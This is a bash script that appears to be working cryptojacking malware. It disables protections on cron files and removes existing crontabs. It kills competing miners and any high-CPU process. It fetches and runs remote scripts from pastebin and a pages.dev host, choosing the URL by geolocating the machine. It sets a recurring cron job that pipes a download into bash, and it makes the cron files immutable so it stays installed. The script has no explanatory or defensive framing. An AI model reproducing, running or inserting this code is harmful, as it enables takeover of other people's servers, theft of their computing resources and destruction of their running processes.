#!/bin/bash for file in /etc/cron.d/$(whoami) /etc/cron.d/apache /var/spool/cron/$(whoami) /var/spool/cron/crontabs/$(whoami) /etc/cron.hourly/oanacroner1; do if [ -f "$file" ]; then chattr -i -a "$file" fi done crontab -r iptables -A INPUT -s 66.23.199.44 -j DROP iptables -A INPUT -s 45.94.31.89 -j DROP ip route add blackhole 139.59.59.33 || true ip route add blackhole 45.94.31.89 || true rm -rf /bin/softirq || true mkdir -p /bin/softirq || true rm -rf /tmp/nuclear || true mkdir -p /tmp/nuclear || true ip route add blackhole 154.89.152.115 || true rm -rf /tmp/runnv/* || true mkdir -p /tmp/runnv/lived.sh || true mkdir -p /tmp/runnv/alive.sh || true mkdir -p /bin/softirq || true rm -rf /usr/local/bin/watcher || true mkdir -p /usr/local/bin/watcher || true nohup sh -c "{ wget -qO- https://pastebin.com/raw/2jtsz9Tk || curl -sSLk https://pastebin.com/raw/2jtsz9Tk; } | tr -d '\r' | sh" >/dev/null 2>&1 & kill_and_remove_process() { local term="$1" if [ -z "$term" ]; then echo "term not provided." return 2 fi local pids pids=$(ps -eo pid,args | grep "$term" | grep -v grep | awk '{print $1}') if [ -z "$pids" ]; then return 1 fi for pid in $pids; do local exe_path exe_path=$(readlink -f "/proc/$pid/exe" 2>/dev/null) if [ -z "$exe_path" ]; then echo "Skipping PID $pid" continue fi # SAFETY CHECK: Exclude common system binary paths case "$exe_path" in /bin/*|/sbin/*|/usr/bin/*|/usr/sbin/*) echo "Skipping system binary for PID $pid at: $exe_path" continue # Move to the next PID ;; esac # If the checks pass, proceed with termination and deletion echo "Terminating non-system process '$term' with PID: $pid" kill -9 "$pid" if [ -f "$exe_path" ]; then echo "Deleting executable: $exe_path" rm -f "$exe_path" if [ $? -eq 0 ]; then echo "Executable successfully deleted." else echo "Error: Failed to delete executable. Check permissions." fi else echo "Executable for PID $pid not found for deletion (already removed or inaccessible)." fi done return 0 } kill_and_remove_process "crazyeltonproxy" || true kill_and_remove_process "xmrig" || true kill_and_remove_process "monero" || true kill_and_remove_process "c3pool.org:80" || true kill_and_remove_process "/bin/watcher" || true kill_and_remove_process "45.94.31.89" || true kill_and_remove_process "hosts-to-ignore" || true kill_and_remove_process "supportxmr" || true kill_and_remove_process "youyutebuae.xyz" || true kill_and_remove_process "nuclear" || true pkill -9 -f 'bash -s ' for pid in $(pgrep -f 'bash /tmp/.*\.sh'); do if [ "$pid" != "$$" ] && [ "$pid" != "$PPID" ]; then kill -9 "$pid" 2>/dev/null && echo "Killed process $pid" fi done if [ "$(id -u)" -eq 0 ]; then echo "Stopping systemd_s service..." systemctl stop systemd_s fi check_system_specs() { local cpu_count=$(nproc 2>/dev/null || grep -c '^processor' /proc/cpuinfo 2>/dev/null || echo 1) local is_root=false if [[ $EUID -eq 0 ]]; then is_root=true fi if [[ $cpu_count -gt 8 && "$is_root" == "true" ]]; then echo "VERY GOOD BOY!" fi } # Call the function check_system_specs kill_high_cpu_processes() { local threshold=150.0 local exclude_patterns=("reservepattern23333" "goAwgBCFH") local pid cpu cmdline ps -eo pid,%cpu --sort=-%cpu | awk -v threshold="$threshold" \ 'NR>1 && $2 > threshold {print $1}' | while read -r pid; do # Read full command line (even if truncated in `ps`) if [ -f "/proc/$pid/cmdline" ]; then cmdline=$(tr '\0' ' ' < "/proc/$pid/cmdline") else echo "PID $pid died before inspection" continue fi # Check for exclusion patterns in full cmdline for pattern in "${exclude_patterns[@]}"; do if [[ "$cmdline" == *"$pattern"* ]]; then echo "Excluding PID $pid (matched '$pattern')" continue 2 fi done if kill -9 "$pid" 2>/dev/null; then echo "Killed PID $pid (CPU: $(ps -p "$pid" -o %cpu --no-headers)%)" else echo "Failed to kill PID $pid (already dead or permission denied)" fi done } kill_high_cpu_processes is_program_running() { found=0 for proc_dir in /proc/[0-9]*; do if [ -d "$proc_dir" ]; then pid=$(basename "$proc_dir") if [ -r "$proc_dir/cmdline" ]; then cmdline=$(cat "$proc_dir/cmdline" 2>/dev/null | tr '\0' ' ') if echo "$cmdline" | grep -q "goAwgBCFH" && \ ! echo "$cmdline" | grep -q "is_program_running"; then if [ -r "$proc_dir/stat" ]; then state=$(awk '{print $3}' "$proc_dir/stat" 2>/dev/null) if [ "$state" != "Z" ]; then found=1 break fi fi fi fi fi done if [ $found -eq 1 ]; then echo "Program is running." return 0 else echo "Program is not running." return 1 fi } download_and_execute() { local primary_url="https://redirect-master-pages.pages.dev/run" local china_url="https://redirect-master-pages.pages.dev/runCN" local output_file="run.sh" local is_in_china=false if command -v curl &> /dev/null; then if curl -s --connect-timeout 3 -4 http://ip-api.com/json/ | grep -q '"country":"China"'; then is_in_china=true fi elif command -v wget &> /dev/null; then if wget -qO- --timeout=3 -4 http://ip-api.com/json/ | grep -q '"country":"China"'; then is_in_china=true fi fi # Select appropriate URL local download_url="$primary_url" if [ "$is_in_china" = true ]; then download_url="$china_url" fi # Download the script if command -v wget &> /dev/null; then wget -qO "$output_file" "$download_url" elif command -v curl &> /dev/null; then curl -k -o "$output_file" "$download_url" else echo "Error: Neither wget nor curl is available. Please install one of them." exit 1 fi # Execute if download succeeded if [[ -f "$output_file" ]]; then chmod +x "$output_file" sed -i 's/\r$//' "$output_file" bash ./"$output_file" rm -f "$output_file" else echo "Error: Failed to download the script from $download_url" exit 1 fi } get_cpu_count() { # Try different methods to get CPU count if [ -f "/proc/cpuinfo" ]; then grep -c ^processor /proc/cpuinfo else sysctl -n hw.ncpu 2>/dev/null || nproc 2>/dev/null || getconf _NPROCESSORS_ONLN 2>/dev/null || echo 1 fi } is_ec2_host() { # Check if hostname contains "ec2" (case insensitive) hostname | grep -qi -e "ec2" -e "compute" return $? } # Main logic if ! is_program_running; then cpu_count=$(get_cpu_count) if [ "$cpu_count" -gt 3 ] || is_ec2_host; then download_and_execute else echo "LOW CPU: System has only $cpu_count CPUs (minimum 4 required) and is not an EC2 instance" fi fi create_cronjob() { local cron_command if command -v curl >/dev/null; then cron_command="/bin/sh -c 'curl -fsSLk $1 | tr -d '\''\r'\'' | bash'" elif command -v wget >/dev/null; then cron_command="/bin/sh -c 'wget -qO- $1 | tr -d '\''\r'\'' | bash'" else log "Error: Cannot create cron job, neither curl nor wget is available." return 1 fi (crontab -l 2>/dev/null | grep -vF "$1"; echo "*/75 * * * * $cron_command") | crontab - log "Cron job successfully configured." } create_cronjob "https://redirect-master-pages.pages.dev/mon" for file in /etc/cron.d/$(whoami) /etc/cron.d/apache /var/spool/cron/$(whoami) /var/spool/cron/crontabs/$(whoami) /etc/cron.hourly/oanacroner1 /etc/init.d/down; do if [ -f "$file" ]; then chattr +i "$file" chattr +a "$file" fi done